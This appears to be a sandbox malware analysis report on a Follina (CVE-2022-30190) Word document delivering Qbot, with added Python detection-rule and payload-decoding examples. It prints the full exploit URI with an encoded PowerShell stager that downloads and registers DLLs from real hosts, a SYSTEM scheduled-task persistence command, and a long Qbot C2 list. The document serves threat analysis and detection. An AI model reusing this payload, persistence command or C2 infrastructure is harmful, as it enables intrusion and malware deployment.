Windows Analysis Report
doc782.docx
Overview
General Information
Detection
CryptOne, Follina CVE-2022-30190, Qbot
| Score | Range | Whitelisted | Confidence |
|---|---|---|---|
| 100 | 0 - 100 | false | 100% |
Signatures
Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
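The signature list above is what the sandbox matched after the fact. The same chain is what an endpoint rule should catch on process-creation telemetry: an Office process launching msdt.exe with an ms-msdt: URI, regsvr32 registering a file out of the user's Temp directory, and a scheduled task created with /RU SYSTEM whose action re-launches that loader. The following is an added example, not part of this report or of Joe Sandbox: three rule functions evaluated over constructed process-creation events. PIDs and paths are taken from the report's process tree; the parent links, the shortened msdt command line and the two benign control events are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """A process-creation event as a detection engine sees it (Sysmon EID 1 / 4688 shape)."""
    pid: int
    parent_image: str
    image: str
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Locations a standard user can write to; a DLL that regsvr32 loads from here is suspect.
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
SYSTEM_RUNAS = re.compile(r'/RU\s+"?(?:NT AUTHORITY\\)?SYSTEM"?', re.IGNORECASE)
# The /TR value is a quoted string that may itself contain escaped quotes (\").
TASK_ACTION = re.compile(r'/TR\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_msdt(ev: ProcEvent) -> bool:
    """An Office application launching msdt.exe with an ms-msdt: URI (Follina exploitation)."""
    return (
        _basename(ev.parent_image) in OFFICE_APPS
        and _basename(ev.image) == "msdt.exe"
        and "ms-msdt:" in ev.cmdline.lower()
    )


def regsvr32_from_user_writable(ev: ProcEvent) -> bool:
    """regsvr32 registering a file that lives in a user-writable directory."""
    return _basename(ev.image) == "regsvr32.exe" and USER_WRITABLE.search(ev.cmdline) is not None


def schtasks_system_loader(ev: ProcEvent) -> bool:
    """schtasks creating a SYSTEM task whose action is regsvr32/rundll32 on a user-writable path."""
    if _basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return False
    if SYSTEM_RUNAS.search(ev.cmdline) is None:
        return False
    m = TASK_ACTION.search(ev.cmdline)
    if m is None:
        return False
    action = m.group(1).lower()
    loader = "regsvr32" in action or "rundll32" in action
    return loader and USER_WRITABLE.search(action) is not None


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "office_spawns_msdt": office_spawns_msdt,
    "regsvr32_from_user_writable": regsvr32_from_user_writable,
    "schtasks_system_loader": schtasks_system_loader,
}


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Run every rule over every event; return (rule name, pid) per hit, in event order."""
    return [(name, ev.pid) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample events modelled on the process tree in this report. PIDs and paths
# come from the report; parent links and the shortened msdt command line are assumptions,
# and the last two events are benign controls that must not fire.
EVENTS = [
    ProcEvent(2344, r"C:\Windows\explorer.exe",
              r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding'),
    ProcEvent(6524, r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
              r"C:\Windows\system32\msdt.exe",
              r'"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=$(Invoke-Expression(calc))i/../../../../Windows/System32/mpsigstub.exe"'),
    ProcEvent(2108, r"C:\Windows\system32\msdt.exe", r"C:\Windows\system32\regsvr32.exe",
              r'"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A'),
    ProcEvent(408, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\system32\schtasks.exe",
              r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59'),
    ProcEvent(9001, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\regsvr32.exe",
              r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
    ProcEvent(9002, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\schtasks.exe",
              r'schtasks.exe /Create /RU SYSTEM /tn Backup /tr "C:\Program Files\Backup\backup.exe" /SC DAILY'),
]

if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name}: pid {pid}")
```

The schtasks rule parses the /TR value instead of substring-matching the whole command line so that a SYSTEM task pointing at a program in Program Files (the 9002 control) stays quiet; the user-writable path check is applied to the task action itself, which is where this sample's loader lives.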
Classification
- System is w10x64
- WINWORD.EXE (PID: 2344 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
- MSOSYNC.EXE (PID: 4584 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
- MSOSYNC.EXE (PID: 3108 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
- msdt.exe (PID: 6524 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 6676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cvtres.exe (PID: 1924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 4500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cvtres.exe (PID: 6404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 2108 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- explorer.exe (PID: 5316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- schtasks.exe (PID: 408 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59 MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- regsvr32.exe (PID: 5968 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- explorer.exe (PID: 6384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- regsvr32.exe (PID: 2312 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
- explorer.exe (PID: 5836 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
- csc.exe (PID: 5892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cvtres.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- regsvr32.exe (PID: 4400 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: D78B75FC68247E8A63ACBA846182740E)
- regsvr32.exe (PID: 4420 cmdline: -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
- cleanup
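The msdt.exe command line in the process tree is the whole Follina payload: the ms-msdt: URI carries, between two [char]34 markers, a base64 blob that the diagnostic script decodes with [System.Text.Encoding]::Unicode and hands to Invoke-Expression. The following is an added example, not part of this report or of Joe Sandbox: it rebuilds that command line from the blob transcribed above, decodes it as UTF-16LE, and pulls out the download hosts, drop paths and regsvr32 targets. It uses only the Python standard library; the function and constant names are this example's own.

```python
import base64
import re

# The base64 blob carried by the ms-msdt: URI in this report's msdt.exe command line,
# transcribed from the report (the payload is UTF-16LE PowerShell).
FOLLINA_B64 = (
    "JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABw"
    "ADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEA"
    "bgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0"
    "AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUA"
    "NQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1"
    "AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAA"
    "OgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBh"
    "AG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwA"
    "dAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBl"
    "AGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMA"
    "MgAgACQAcABcAHQAMgAuAEEA"
)

# The msdt.exe command line rebuilt from the report around that blob, so the parser is
# exercised on the real URI shape. [char]58 stands for ':' and [char]34 for '"': the
# dropper avoids writing "::" and quotes directly into the document.
MSDT_CMDLINE = (
    'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? '
    "IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
    "'[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'"
    "+[char]58+[char]58+'FromBase64String('+[char]34+'"
    + FOLLINA_B64
    + "'+[char]34+'))'))))i/../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
)

_B64_RE = re.compile(r"FromBase64String\('\+\[char\]34\+'([A-Za-z0-9+/=]+)'")
_URL_RE = re.compile(r"https?://[^\s;'\"]+")
_OUTFILE_RE = re.compile(r"-OutFile\s+([^\s;]+)", re.IGNORECASE)
_REGSVR_RE = re.compile(r"regsvr32(?:\.exe)?\s+(?:[-/]s\s+)?([^\s;]+)", re.IGNORECASE)


def extract_encoded_payload(cmdline: str) -> str:
    """Return the base64 text between the two [char]34 markers of a Follina-style URI."""
    m = _B64_RE.search(cmdline)
    if m is None:
        raise ValueError("no FromBase64String('+[char]34+'...') blob in command line")
    return m.group(1)


def decode_follina_payload(cmdline: str) -> str:
    """Decode the PowerShell that msdt.exe would hand to Invoke-Expression.

    [System.Text.Encoding]::Unicode is UTF-16LE, so the bytes must be decoded as such;
    a plain base64 -d shows the script with a NUL byte after every character.
    """
    raw = base64.b64decode(extract_encoded_payload(cmdline), validate=True)
    return raw.decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull download URLs, drop paths and regsvr32 load targets out of the decoded script."""
    urls = _URL_RE.findall(script)
    return {
        "hosts": [u.split("/")[2] for u in urls],
        "urls": urls,
        "outfiles": _OUTFILE_RE.findall(script),
        "regsvr32_targets": _REGSVR_RE.findall(script),
    }


if __name__ == "__main__":
    script = decode_follina_payload(MSDT_CMDLINE)
    print(script)
    for key, values in extract_iocs(script).items():
        print(f"{key}: {values}")
```

Decoded, the blob is one PowerShell line: it sets $p to the user's Temp directory, fetches $(random).dat from 104.36.229.139, 85.239.55.228 and 185.234.247.119 into $p\t.A, $p\t1.A and $p\t2.A, and registers each with regsvr32. That accounts for the three regsvr32.exe processes on t.A, t1.A and t2.A in the process tree and for the Snort alert on traffic from 185.234.247.119 later in this report.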
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", 
"40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}
| Rule | Description | Author |
|---|---|---|
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
| Rule | Description | Author |
|---|---|---|
| MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
| MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
| MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| Rule | Description | Author |
|---|---|---|
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

(22 entries in total, 5 shown)
| Rule | Description | Author |
|---|---|---|
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
| JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

(31 entries in total, 5 shown)
Persistence and Installation Behavior
Snort IDS alert for network traffic (Author: Joe Security):

| Timestamp | Source | Destination | Protocol | SID | Classtype |
|---|---|---|---|---|---|
| 06/07/22-18:38:14.250872 | 185.234.247.119:80 | 192.168.2.22:49173 | TCP | 2036726 | Attempted User Privilege Gain |
AV Detection
Source: Virustotal
Source: ReversingLabs
Source: Malware Configuration Extractor